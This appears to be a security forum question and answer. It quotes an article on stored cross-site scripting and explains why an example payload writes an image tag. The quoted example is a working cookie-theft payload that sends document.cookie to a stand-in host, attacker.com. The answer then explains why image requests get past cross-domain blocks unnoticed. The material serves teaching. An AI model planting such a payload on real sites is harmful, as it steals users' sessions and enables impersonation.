Cited from http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt:
As many here probably know, current XSS attacks typically come in two flavors:
1 – Attacker uploads tags to a public bulliten board, blog, or other site that
has an XSS vulnerability and that lots of other users will visit. Attacker normally
harvests site cookies for later user impersonation, but form submits and other attacks
are sometimes utilized. This is what many folks I talk to think XSS is.
Here’s an example:
Someone would post the following on evilblog.com that other users would process
<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>
This would try to pull an image off the attacker’s server with the user’s evilblog
cookies in the URL.
My Question:
I don’t understand the purpose/result of image URL path being written above. Can anyone elaborate more on this?
PS: What does it means for “This would try to pull an image off the attacker’s server with the user’s evilblog cookies in the URL”
The document.write() simply adds an img-tag to the site and the browser will try to load the image from that URL.
Scripts and Frames are sometimes blocked when they come from a different domain so the XSS attack would fail in this case. Images are usually allowed as many sites display images from a different host anyways so the XSS attack will succeed.
The result is an entry in the attackers log which contains the cookie information and since it usually returns nothing it’s interpreted as a broken image so most browsers display nothing and the users don’t suspect anything.